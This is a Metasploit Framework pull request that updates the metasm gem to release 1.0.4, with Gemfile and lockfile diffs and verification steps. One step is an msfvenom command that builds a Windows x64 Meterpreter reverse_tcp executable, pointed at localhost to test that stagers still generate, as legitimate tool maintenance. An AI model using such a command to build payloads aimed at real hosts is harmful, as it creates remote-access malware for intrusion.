### PR TITLE
Bump to released metasm 1.0.4

### DIFF
--- a/Gemfile
+++ b/Gemfile
@@ -5,9 +5,6 @@ gemspec name: 'metasploit-framework'
 
 gem 'sqlite3', '~>1.3.0'
 
-# use custom metasm until fix for 2.5 is released
-gem 'metasm', git: "https://github.com/rapid7/metasm", branch: "ruby_2_5_compat"
-
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
   # code coverage for tests

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,10 +1,3 @@
-GIT
-  remote: https://github.com/rapid7/metasm
-  revision: 916b7ca5a728321a8a4a890bd21e588e1f2ac5a6
-  branch: ruby_2_5_compat
-  specs:
-    metasm (1.0.4)
-
 PATH
   remote: .
   specs:
@@ -165,6 +158,7 @@ GEM
     loofah (2.2.3)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
+    metasm (1.0.4)
     metasploit-concern (2.0.5)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -375,7 +369,6 @@ PLATFORMS
 DEPENDENCIES
   factory_bot_rails
   fivemat
-  metasm!
   metasploit-framework!
   octokit
   pry


### PR DESCRIPTION
Update metasm to fixes stagers generated by Metasploit running on Windows when executing against ruby >= 2.5

## Verification

List the steps needed to make sure this thing works

on windows using ruby 2.5
- [x] Start `msfconsole`
- [x] `irb`
- [x] **Verify** `true` is returned for final instruction from 
```
require 'metasm'
cpu = Metasm::X64.new
src ="cmp al, 'a'"
encoded = Metasm::Shellcode.assemble(cpu, src).encode_string
s = "\x3c\x61"
s.force_encoding('BINARY')
s == encoded
```
- [x] **Verify** `windows/x64/meterpreter/reverse_tcp` will generate a valid sessions
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > metWin_staged_127_4444.exe
```

